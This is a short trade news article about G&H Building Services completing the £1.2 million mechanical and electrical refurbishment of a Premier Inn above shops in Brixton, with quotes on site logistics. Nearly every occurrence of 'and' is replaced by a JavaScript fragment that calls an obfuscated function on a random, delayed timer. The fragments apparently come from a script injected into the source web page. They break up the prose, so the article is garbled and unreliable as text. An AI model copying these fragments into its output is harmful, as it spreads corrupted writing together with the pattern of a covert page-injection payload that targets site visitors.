The refurbishment of the mechanical andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and electrical infrastructure of a 90-bed Premier Inn hotel in the heart of London has been completed by G&H Building Services.

Situated above a row of shops in a five-storey building in Brixton’s busy high street, G&H Building Services designed, built andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and installed the project’s mechanical andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and electrical services.

G&H Building Services was appointed by main contractor JJ Rhatigan & Company in a £1.2 million contract.

Innovative designs saw two plant rooms – one on the roof that included a combined heat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and power unit andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the other in the basement included distribution plant – used to make best use of the space available.

Contracts Department Manager at G&H Building Services, Paul Churchill, said: “We have extensive experience working in Central London which is vital given the unique challenges it presents.

“Due to the lack of on-site storage space, deliveries to the high street site had to be precisely timed so vehicles could park close to the hotel.

“Access to the hotel suites was via a stairwell so many of the materials andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and equipment had to be manually transported to the third andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and fourth floors.

“These logistical challenges were compounded by the close proximity of a public house andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and fast food outlet andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and a high number of pedestrians around the site.

Due to the success of the scheme, G&H Building Services has secured the M&E services for another refurbishment project for Premier Inn in Tolworth, London.
